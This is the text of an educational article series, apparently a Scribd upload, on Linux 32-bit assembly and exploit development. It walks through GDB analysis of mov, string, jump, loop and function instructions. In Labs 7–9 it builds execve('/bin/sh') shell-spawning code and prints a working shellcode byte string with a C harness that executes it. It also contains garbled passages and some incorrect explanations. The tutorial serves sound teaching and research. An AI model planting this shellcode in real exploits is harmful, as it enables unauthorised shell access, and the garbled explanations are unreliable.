0% found this document useful (0 votes)
45 views40 pages

Malware Analysis and Exploit Development Security Professionals

Uploaded by

Mesara Al-anani
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
45 views40 pages

Malware Analysis and Exploit Development Security Professionals

Uploaded by

Mesara Al-anani
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 40

Prepeared By @ALPARSLAN AKYILDIZ

LINUX ASSEMBLY AND


EXPLOIT DEVELOPMENT
ARTICLE SERIES PART 3
 GDB USAGE
 EXECVE CUSTOM SHELLCODE CREATION
 CREATING FUNCTIONS
 STRING OPERATIONS
 LOOPS

1
Contents

LAB 4: Data Types in Assembly Programming...................................................................................... 3


LAB 5: Assembly Variable Assignment And Moving Operations ......................................................... 5
LAB 6: Assembly Character Operations ............................................................................................... 14
LAB 7: Assembly JMP Command, LOOP Creation And EXECVELAB 7 ......................................... 24
LAB 8: Creating a Linux Assembly Function ....................................................................................... 34
LAB 9: Shellcode with EXECVE ......................................................................................................... 36

2
LAB 4: Data Types in Assembly Programming

One of the points that should be known when writing a program using the assembly is the size of the
data. 1 byt field is reserved for the variable defined by the .byte. .ascii is used for specifying character
strings, and .asciz, terminated characters, and .int, 32-bit integer values, and .short, 16-bit integer
values, and .float, fractional numbers. Common memory areas are indicated by .comm, and local
memory areas, by .lcomm. For a better understanding of the subject, a simple assembly program will
be written as follows and analyzed with the GDB.
Within the code, “assembly hacker” will be inserted into the string variable, and the value 32, in the
variable integer, and the elements 1, 2, 3, 4, 5, in the variable array, and the element 12, in the
variable short, and the element 11, in the variable byte. A field of 2000 bytes, which is not initilized
with initial values, is reserved in the common memory area.

Since the codes will be analyzed with GBD, the parameter –gstabs is used while they are being
converted into the objects.

The program is linked as follows

3
While analyzing with the tool GDB, the following steps are examined:

ri

The beginnig addresses of the data kept within the variables in the memory are displayed using the
command info variables after the breakpoint has been placed at the code in the 28th line and the
program has been executed with the command run. The initial address point of the “assembly
hacker” array that the string variable holds in itself is the address value that is written opposite the
string variable. With the x / examine command, the data in the addresses can be displayed as shown
below:

4
As can be seen in the screenshot, there are the variable values created within the memory region
pointed by the addresses.

LAB 5: Assembly Variable Assignment And Moving Operations

In order to understand the assembly coding while reading the assembly codes, the syntax and rules
of the transport operations must be known. 32-bit data is moved with the command movl, and 16-bit
data, with the command movw, and and 1-byte, that is to say 8-bit, data, with the command mowb.
The data movment can be done from one register to another register. For example, with the
command % ecx, the movl% eax is moved into the register ecx in the eax. The point to be considered
while moving data is that the source and target must be the same size. In addition, data can be
moved from a memory region to a register (vice versa).

Let's examine the representative code below:

variable_place:

.int 20

movl %eax, variable_place: The address showing the value 20 is placed in the eax.

In that … case, the (% eax) shows 20, and the % eax moves the address value to …. The immediate
values (data such as fixed numbers) can be copied directly into the register. For example, the
following code can be used to put the value 20 into the register eax:

5
movl $20, %eax

The value of the variable in a memory region can be changed as follows:

memory_place:

.byte 10

movb $20, memory_place: while there is the value 10 in the memory address, the value 20 is put
into the place indicated by this address. The structure array(offset, index, size) is used to move the
value into the array. A sample movement is shown in the output below:

array:

.int 10, 20, 30, 40, 50

movl %eax, array(0,2,4): The value in the eax will be written instead of 30.

Important Rules for AT&T Syntax:

 When the “$” sign comes before the tag name, the memory address of the variable is taken.
For example, when variable_place was written in the above example, the value stored in the
address was taken. If $ variable_location was used, the address pointing to the variable
would be represented.

 (% edi) indicates the value stored in the region indicated by the address in the edi register.
The memory region where the value 9 is kept with the edi is displayed with the command
movl $11, (%edi), that is the (%edi) gives the value of 9.

 The meaning of the code movl $4, 9(%edi) is that 9 will be added to the address indicated by
the edi and the number 9 will be placed in the newly displayed memory region: (EDI + 9).

 Likewise, the -2 (% edi) indicates the location of the address (EDI -2).

6
The GDB analysis will be performed on the program by writing additional codes to the codes written
in LAB 4 for a better understanding of the subject. The following codes are added to the section
_start: on the program codes written in LAB 4:

After the program written above has been assembled and linked, it is analyzed with the GDB as
follows.

The program is linked using the the commands below:

as –gstabs program.s –o program.o

ld program.o –o program

The analysis starts with the command gdb./program. The breakpoint is set at the point _start. In this
way, the program flow will be monitored.

“gdb ./program” ?

7
When the program which the breakpoint is set on is started with the command run, the instant
values of the addresses where the variables are in memory and of the registers are shown in the
output as above. When the code is run with the command s, the value 20 is put into the eax register
as shown below:

“s” ?

8
When looking inside the memory region, it is seen that the integer is the first assigned value and the
value 6 is assigned instead of it after the code piece has worked.

When using the commands print and x (examine), these two commands can be mixed. The following
experiment can be done to elucidate this confusion:

9
The print command prints the value in the eax onto the screen, and the x command, the data kept in
the memory area indicated by the address value in the eax onto the screen. The GDB has printed an
error since the value 20 does not have any address.

As can be seen, the value 11 in the memory area addressed by byte is assigned to the eax register. In
the next command, the value 2 will be assigned to the al, this value will be written instead of the
value 11 in the memory region indicated by byte as shown below:

10
The address of the byte variable is shown above: &bayt. The value 2 is assigned to the variable byte.
In the code line movl $ byte,% edi, the address of the variable byte is put into the register edi.

The value in the register edi becomes the value of the variable byte. When looking at the place
pointed by the register edi with the command x, the value 2 is seen. When the value kept in the $ edi
is displayed with the command print, the decimal address of the variable byte is also printed on the
screen as shown below:

After this step, the value 12 will be written into the memory region indicated by the (%edi) edi.
Instead of this value, which was 2 previously, the value 12 is assigned as follows:

11
In the last step, the value in the array is changed as follows:

12
The value 13 is assigned instead of the value 3. In the application above, the assignments made with
the command mov in Linux 32-bit assembly are exemplified.

13
LAB 6: Assembly Character Operations

In this example application, the character operations will be shown and their analysis will be
performed on GDB. In the first step, the sample program is written as follows. In the program
written, ESI shows the source character, and EDI, the target. As will be remembered from the first
chapter, the register esi is used for reading, and the register edi, for writing. The written sample
program is shown below:

14
The program will be analyzed with GDB by setting a breakpoint in the _start function. After the
variables are defined on .data and .bss, the operations performed in _start will be explained step by
step as follows:

As the program will read from the comment lines, after the $ sign is put at the beginning of the
variables and their addresses are loaded into the esi and edi, 1 byte data is copied from the source to
the destination with the movsb command, and 16 bit data, from the source to the destination with
the movsl command, and 32 bit data, from the source to the destination with the movsw command.
The GDB analysis of the procedure described so far has beens carried out as follows:

15
16
The variables are displayed and their addresses are printed on the screen. The insides of the registers
esi and edi are empty as seen. The first command to run is the nop command. When the program
flow is continued after this command is executed, the initial addresses where the string1 characters
are located in memory will be written into the esi, and the initial addresses where the string2
characters are located in memory, into the edi. In the last step, the copying will be done with the
mov commands:

When the mov commands are executed, the string1 characters are copied onto the string2 as
follows:

First 1 byte, then 16 bit (2 byte) and then 32 bit (4 byte) data are copied onto the string2. The edi
value changes with each copy operation. The edi register indicates where the last copied character is
written. The output below shows the final value of the edi register:

17
DF is the flag that decides whether to increase or decrease the esi or edi values after each movs
command. The gdb only shows the set flag values. For example, it is seen that the only if (interrupt
flag) is set in the program flow in the output below:

18
The command rep is a command that repeats the character operations as long as the ecx value is
greater than 0. In the first block of codes, the esi and edi values spontaneously increased with every
mov operation. Therefore, after the first byte is copied, the movement process is carried out by
getting the remaining values to continue from the address reached in the previous process. When
the df is set in the operations with the rep, after the operation, the reset process is done with the cld
command.

19
The GDB analysis of the progressive commands is done as shown below:

20
Using the LODSx command, the loading is done into the eax register. The source character address is
indicated by the esi register. The lodsb moves 8-bit data from the memory into the al register, and
the lodsw, 16 bit-data from the memoryin to the ax register, and the lodsl, 32-bit data from memory
into the eax register. With the command leal (load effective address), the address of the string1
variable is written directly into the esi register. Using the lodsb command, the string1 variable’s 1-
byte (8-bit) data since the address at which it starts to sit in the memory with the esi is shown. By
putting 0 into the al, the esi value is reduced by 1. The reason for this reduction is that the esi value
has increased by 1 after the movement, and the code writer wants the register esi to return to its
previous value. The 16-bit data is displayed by the esi using the lodsw command, and the 32-bit data,
by the esi in order for the movement operation to be done using the lodsl command. With the sub
command, the esi register value is reduced by 1 again and is returned to its previous value.

leal var2, %edi

stosb

stosw

In the code line written above, the address var2 is displayed with the edi, and then the relevant value
is moved into the location shown in the memory with the edi with the stos command: If the stosb
instruction is used, the value is moved with the al, and if the stosw instruction is used the value is
moved with the ax, and if the stosl instruction is used the value is moved with the eax.

21
In the last piece of the code, the first byte values of the two character strings indicated by the esi and
edi were compared with the cmpsb command. The comparison is done like subtraction. If the result
is zero, the data compared are the same. Therefore, zf (zero flag) will be set as 1.

22
23
LAB 7: Assembly JMP Command, LOOP Creation And EXECVELAB 7

The JMP command functions the same as the command GOTO in the C programming language. In
other words, by showing the place to go in the program, the program flow continues over the shown
place with the JMP command. The JMP commands, conditionally and unconditional, can be used
within the program. The JMP working logic is examined in the program written below:

24
When the program is examined, it is seen that global and assigned variables are defined on the .data
segment side. The character string starting from the address indicated by the message variable in the
_start is printed on the screen. With the JMP command, the outgoing code set was skipped and
jumped to the execve tag. Firstly, a prelog operation is performed in the execve and a 8- byte section
is reserved in the stack with the SUB command. This is because two 4 bytes of data must be put in
the stack. The representation of the Execve program written in the C programming language is as
follows:

char *data[2];

data[0] = "/bin/sh";

data[1] = NULL;

execve(data[0], data, NULL);

In the function, it is necessary to give the values "/bin/sh" and NULL, ie 0 through the array.
Therefore, a 8-byte space is opened in the stack. System call number for execve is specified as 11 in
the table in which the system call numbers are indicated:

11. sys_execve

Syntax: int sys_execve(struct pt_regs regs)

Source: arch/i386/kernel/process.c

Action: execute program

After the string "/bin/sh" in the variable file_to_run is displayed with the regester edi, this value is
placed 8 bytes below the address indicated by the EBP. The value 0 is also placed 4 bytes below the
address indicated by the EBP. After 11 is assigned to the eax as the system call number, by putting
the start address of the address where the “/bin/sh” characters are located in the memory in the
ebx, the command line parameters are taken with the ecx. The program was run by being passed
through the operations of being assembled and linked as below:

25
The gdb analysis of the program is carried out as follows for a better understanding of the subject.
Any function can be disassembled using the disassemble command. Below, the execve has been
disassembled. Register and variable analyses have been performed in the _start designated progress
as a breakpoint.

In the first steps, the message is printed on the screen. When the jmp command will run, the eip
status is examined as follows. The memory address of the command shown with jmp was loaded into
the eip when the jmp command is executed and the program flow continues under the execve tag.
The exit operation was skipped not working due to the jmp jumping.

26
When the execve starts, the variable addresses are placed in the registers as below and the
characters to be used in the stack and the value 0 are assigned to the relevant places for the execve
function to work. As can be seen in the analysis, after putting the address of the file_to_run variable
in the edi, this address value is placed in the memory region indicated by the ebp-8 address. Then,
the value 0 is placed in the memory region indicated by the address of ebp-4. Calling the function
execve with the system call number 11, the address indicating /bin/sh is placed in the ebx, then the
command line parameters are taken by the ecx, and the program gave the shell as follows:

27
28
The command call is a command used to call functions. With the command ret, the function outgoing
address is displayed and, the program flow continues from where it left off via the eip. The command
ret is similar to the command return in the C programming language. Each time the command call is
run, the command ret must also be run within the next set of commands. The address of the first
command to run is pushed into the stack in order for the program flow to be able to continue after a
function which was called with the command call has completed to work and returned to the main
program. After the function has finished working, this address is pointed out from the inside of the
eip with the command ret and poped from the inside of the stack, and the program flow continues.
In order to demonstrate the use of the command call, the program which has been produced by a
small change made in the previous program will be analyzed with the gdb as shown below:

The code written was examined on the gdb as follows:

29
The eip shows the address of the command interrupt to run next. The values in the stack are checked
as above. After running the command call, the program flow is directed into the sayyou. When the
stack is checked after this point, it is seen that the address 0x0804890 has been pushed into the
stack. As explained in the theoretical section, the address of the command nop after the code line
where the function is called is pushed into the stack as the return address so that the program flow
can continue after the function codes have completed their functions. In the output below, the
address of the nop command is seen with the disassembler. As seen in the output below, the address
of the nop command is gained with the disassembler:

30
The command loop decreases the value of the register ecx by 1 each time the loop rotates. The
command jz jumps if it is zero-flag-set. The command jnz jumps if it is not zero-flag-set. Similarly, if
the command loopz is zero-flag-set, the loop returns while the loop continues to rotate as long as the
command loopnz is not zero-flag-set. The use of the command loop was shown in the example
above. Its format is as follows:

Command set

movl $20, %ecx

Lupla:

Command set

LOOP lupla

The loop will return 20 times as 20 is loaded to the ecx in the above format. In the program shown
below, the character string defined in the data section is printed on the screen 12 times. The change
of values in the register ecx is shown with the gdb as follows. The program output is as shown:

31
Program codes:

For the analysis with the gdb, a break point has been placed at the point where the command pushl%
ecx is located. Each time the loop rotates, the ecx value is reduced by 1.

32
As can be seen in the output, the eip value is decreased by 1 each time the loop rotates.

33
LAB 8: Creating a Linux Assembly Function

In this lab work, creating a function in Linux assembly software will be mentioned. The syntax is
shown below:

.type fonksiyon ismi, @fonksiyon

fonksiyon ismi:

Komut kümesi

ret

The written function is called with the command call. Based on the above structure, the sample
function code is written as follows:

.data

warning:

.asciz "Attack detected execve coming"

file_to_run:

.asciz "/bin/sh"

.text

.global _start

_start:

.type shell, @function

.type print, @function

print:

movl $4, %eax

movl $1, %ebx

movl $30, %edx

leal warning, %ecx

34
int $0x80

call shell

shell:

pushl %ebp

movl %esp, %ebp

subl $0x8, %esp # array of two pointers. array[0] = file_to_run array[1]

movl $file_to_run, %edi

movl %edi, -0x8(%ebp)

movl $0, -0x4(%ebp)

movl $11, %eax # sys_execve

movl $file_to_run, %ebx # file to execute

leal -8(%ebp), %ecx # command line parameters

movl $0, %edx # environment block

int $0x80

leave

ret

call print

35
LAB 9: Shellcode with EXECVE

In the previous lab studies, the execve was used. In this lab study, the execve will be written using
the assembly and C programming languages. The code written will be converted into the machine
codes with the tool objdump, and the shellcode will be obtained. In the exploitation process, the
code to be injected into the memory must be understood by the RAM. In order for the code to be
understood and interpreted by RAM, the code in the format being converted into machine code
must be sent to the RAM. For this reason, the shellcode is used. Shellcode is a piece of code used to
run the commands in the target shell consisting of the hex characters written in machine language.
The execve structure is displayed as follows with the man execve.

Based on the spelling format on the manual page, the code is written as follows:

36
The array args is a pointer array that holds the memory address of the other arrays and has two
elements. The first element is the /bin/sh, which is the file that allows the commands to be run on
the Linux operating systems. Args [1] is shown as NULL due to the rule that each string must end with
NULL. The program is written according to the format by putting file (/bin/sh), file address and NULL
in execve. The program was compiled with the gcc using the following command:

gcc -ggdb shell.c -mpreferred-stack-boundary=2 -static -o shell.exe

With the parameter -mpreferred-stack-boundary=2, it is provided that the sections each of which
includes 2 bytes instead of 4 bytes in the values placed in the STACK are reserved.

Static libraries are linked with the parameter –static. Connection can not established with the shared
libraries.

When the written code is disassembled with the gdb, the main function is broken down as follows:

Looking at the disassambed code, it is seen that the code starts with the prelog process. A 20-byte
(0x14-> 16 + 4 = 20) space is allocated in the stack region. The address showing the character
"/bin/sh" is placed under 8 bytes below the address indicated by the ebp. In the output above, it is
shown with the command x that this address shows the /bin/sh character string. The value 0 is
placed 4 bytes below the EBP address. The address inside the address indicated by ebp-8 is loaded

37
into the eax. The eax is currently shows the character "/bin/sh". The value 0 is placed in the address
indicated by ESP + 8. The address in the ebp-8 is loaded into the edx. The value in the edx is placed in
the address indicated by the esp + 4. The function execve is called after the value in the eax is placed
within the address indicated by the esp. After this point, the shell operation is performed using the
value 0 and the "/bin/sh" character string and address by the execve.

The code written in the C programming language was disassembled. So, we got an idea about its
working mechanism. The same code was written in the assembly language in the previous LAB study.
The sample code was as follows:

11. sys_execve

Syntax: int sys_execve(struct pt_regs regs)

Source: arch/i386/kernel/process.c

Action: execute program

Below, with the command objdump, the machine-code-converted equivalent of the code to create a
shellcode is displayed:

38
In the output above, the characters 00 are seen. The \x00 as a NULL character stops the shellcode
from running in memory. In addition, the characters such as carriage return, line feed, \x0a, and \x0d
prevent the shellcode from opening as they perform carriage return and jump to the next line. These
characters need to be cleared from the shellcode. Automatically clearing bad characters will be
shown in the following topics. Instead of the mov commands that generate the null characters, the
commands such as push and jmp are used to remove the NULL characters. Below is shown the
sample shellcode (Source: http://shell-storm.org/shellcode/files/shellcode-827.php):

Assembly kod:

xor %eax,%eax

push %eax

push $0x68732f2f

push $0x6e69622f

mov %esp,%ebxchine

push %eax

push %ebx

mov %esp,%ecx

mov $0xb,%al

39
int $0x80

ShellCode C

#include <stdio.h>

#include <string.h>

char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"

"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void)

fprintf(stdout,"Length: %d\n",strlen(shellcode));

(*(void(*)()) shellcode)();

return 0;

40

You might also like